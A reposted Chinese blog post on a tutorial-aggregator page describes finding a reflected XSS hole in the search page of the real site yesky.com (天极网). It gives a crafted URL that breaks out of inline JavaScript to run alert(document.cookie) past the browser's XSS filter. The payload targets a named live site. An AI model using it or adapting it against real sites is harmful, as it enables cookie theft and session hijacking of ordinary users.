首页 诗词 字典 板报 句子 名言 友答 励志 学校 网站地图
当前位置: 首页 > 教程频道 > 网站开发 > Web前端 >

顺利了一次

2013-08-01 
成功了一次那个web页面中的编码真蛋疼,今天看了一个分响不错,测试后是成功的,天极网,现在还存在xss漏洞,本

成功了一次

那个web页面中的编码真蛋疼,今天看了一个分响不错,测试后是成功的,天极网,现在还存在xss漏洞,本来他自身就存在漏洞,但是因为浏览器存在xss过滤器,所以我们无法成功攻入,但是老毛说过 特殊情况特殊分析,

?document.forms[0].pageNo.value = num2;?document.forms[0].submit();?


我们要先发现输入点和输出点,才能准确的找到如何进行入侵,在查看源码中找到你的输出点后,发现有一段是存在于JavaScript代码中的,其他的不太好滤过过滤器,

我们构造如下的url请求,

http://search.yesky.com/searchproduct.do?wd=%0a%0d}alert(document.cookie);{'

js还是比较严格的,最后不家那个‘和后面的’闭合无法执行alert的函数,如此成功弹出了本地的cookie

?

?

?

?

?

?

?

?

?

?

热点排行